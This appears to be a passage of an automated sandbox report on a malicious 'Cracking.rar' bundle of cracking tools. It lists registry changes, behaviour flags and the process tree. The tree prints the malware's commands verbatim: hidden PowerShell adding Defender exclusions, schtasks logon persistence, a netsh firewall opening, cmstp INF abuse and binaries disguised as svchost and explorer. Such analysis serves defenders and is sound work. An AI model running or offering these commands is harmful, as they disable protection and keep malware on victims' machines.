| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133331817267996485" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.r02 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r03\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202020202020202020202 | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.r03 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.r13 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.zipx | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r10\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.tar\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r08\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.txz | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bz2\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bz2 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rar | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r22\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.r01 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r06\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r11\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,1" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "19" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r24\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.tgz\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.r00 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.arj | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r14\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.tar | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.r18\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.lzh | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew\FileName = "C:\\Program Files\\WinRAR\\rarnew.dat" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.lz\ = "WinRAR" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bz | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2 | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Cracking.rar
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Cracking.rar
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4948 CREDAT:17410 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa6f769758,0x7ffa6f769768,0x7ffa6f769778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1408 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2988 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2980 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4596 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4752 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4604 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5028 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5128 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5192 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3296 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5604 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5568 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3148 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5840 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5820 --field-trial-handle=1916,i,5878946112938616713,1830333026642564562,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-622.exe
"C:\Users\Admin\Downloads\winrar-x64-622.exe"
C:\Program Files\WinRAR\uninstall.exe
"C:\Program Files\WinRAR\uninstall.exe" /setup
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\WinRAR\WinRAR.exe
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\Cracking.rar"
C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7.exe
"C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe
"C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE
"C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TSPDOR~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TSPDOR~1.EXE
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer.exe"
\??\c:\windows\system32\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Users\Admin\AppData\Local\Temp\lmxavm5i.inf
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\version.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\version.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\OneDrive.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cortana.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cortana.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\OneDrive.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
#cmd
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" "RegAsm.exe" ENABLE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updates.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updates.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Users\Admin\AppData\Local\Temp\updates.exe
"C:\Users\Admin\AppData\Local\Temp\updates.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE
"C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TSPDOR~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TSPDOR~1.EXE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
